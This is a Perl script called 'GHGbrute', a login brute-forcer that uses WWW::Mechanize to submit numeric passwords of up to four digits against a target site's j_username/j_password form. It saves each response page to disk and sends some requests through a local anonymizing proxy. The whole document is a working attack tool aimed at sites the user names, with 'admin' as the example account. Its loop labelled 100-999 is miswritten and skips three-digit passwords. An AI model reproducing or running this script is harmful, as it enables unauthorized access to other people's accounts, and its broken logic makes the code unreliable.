#!/usr/bin/perl
#Thanks to IBM for helping to create this - Bret Sweeden especially
#NBTDOTM

use WWW::Mechanize;
use HTTP::Cookies;

#$ENV{HTTPS_PROXY} = '127.0.0.1:8118';
#$ENV{HTTP_PROXY} = '127.0.0.1:8118';

#Determine the number of arguments the user has given us
$NumArgs = $#ARGV + 1;

if ($NumArgs == 0) {
	#Our user has not entered any information. Display help screen.
	header();
	exit();}
elsif ($NumArgs == 1) {
	#Our user has only entered some information. Display help screen.
	header();
	exit();}
if ($NumArgs == 2) {
	#Our user has entered enough for an attack. Begin!
	
	$host = $ARGV[0]; #Host is the first argument supplied
	$user = $ARGV[1]; #Username is the 2nd argument supplied
	#Display header
print qq{
----------------------------------------------------------------------
  		         Login Brute-Forcer			  
 		        Custom Built by Juno			  
                              NBTDOTM                                
----------------------------------------------------------------------
};
print "\nYour host is: $host";
print "\nYour username is: $user";
print "\n\nThe program will now try bruteforcing the host you selected";

my $url = $host;
my $username = $user;
#1-9
for $i (1 .. 9) {
	print "\nTrying password 000$i...";
	my $outfile = "000" . $i . ".htm";
	my $password = "000" . $i;
	my $mech = WWW::Mechanize->new();
	
	$mech->cookie_jar(HTTP::Cookies->new());

	$mech->proxy(['http', 'https'], 'http://127.0.0.1:8118/', 'https://127.0.0.1:8118/');

	$mech->get($url);
	
	$mech->field(j_username => $username);
	$mech->field(j_password => $password);
	$mech->click();
	$mech->click();
	my $output_page = $mech->content();
	open(OUTFILE, ">$outfile");
	print OUTFILE "$output_page";
	close(OUTFILE);
	print " Done.";
	}

#10-99
for $i (10 .. 99) {
	print "\nTrying password 00$i...";
	my $outfile = "00" . $i . ".htm";
	my $password = "00" . $i;
	my $mech = WWW::Mechanize->new();
	$mech->cookie_jar(HTTP::Cookies->new());
	$mech->get($url);
	#$mech->form_name('j');
	$mech->field(j_username => $username);
	$mech->field(j_password => $password);
	$mech->click();
	$mech->click();
	my $output_page = $mech->content();
	open(OUTFILE, ">$outfile");
	print OUTFILE "$output_page";
	close(OUTFILE);
	print " Done.";
	}

#100-999
for $i (1 .. 9) {
	print "\nTrying password 0$i...";
	my $outfile = "0" . $i . ".htm";
	my $password = "0" . $i;
	my $mech = WWW::Mechanize->new();
	$mech->cookie_jar(HTTP::Cookies->new());
	$mech->get($url);
	#$mech->form_name('j');
	$mech->field(j_username => $username);
	$mech->field(j_password => $password);


	$mech->click();
	$mech->click();
	my $output_page = $mech->content();
	open(OUTFILE, ">$outfile");
	print OUTFILE "$output_page";
	close(OUTFILE);
	print " Done.";
	}

#1000-9999
for $i (1000 .. 9999) {
	print "\nTrying password $i...";
	my $outfile = $i . ".htm";
	my $password = $i;
	my $mech = WWW::Mechanize->new();
	$mech->cookie_jar(HTTP::Cookies->new());
	$mech->get($url);
	#$mech->form_name('j');
	$mech->field(j_username => $username);
	$mech->field(j_password => $password);
	$mech->click();
	$mech->click();
	my $output_page = $mech->content();
	open(OUTFILE, ">$outfile");
	print OUTFILE "$output_page";
	close(OUTFILE);
	print " Done.";
	}

}

print "\n\nAudit complete!";

exit();

sub header{
print qq{
----------------------------------------------------------------------
  		         Login Brute-Forcer			  
 		        Custom Built by Juno			  
                              NBTDOTM                                
----------------------------------------------------------------------
Usage: GHGbrute -[target site] -[user]

Example: GHGbrute somesite.com -admin

The program will attempt a numerical bruteforce to four places. 
};
}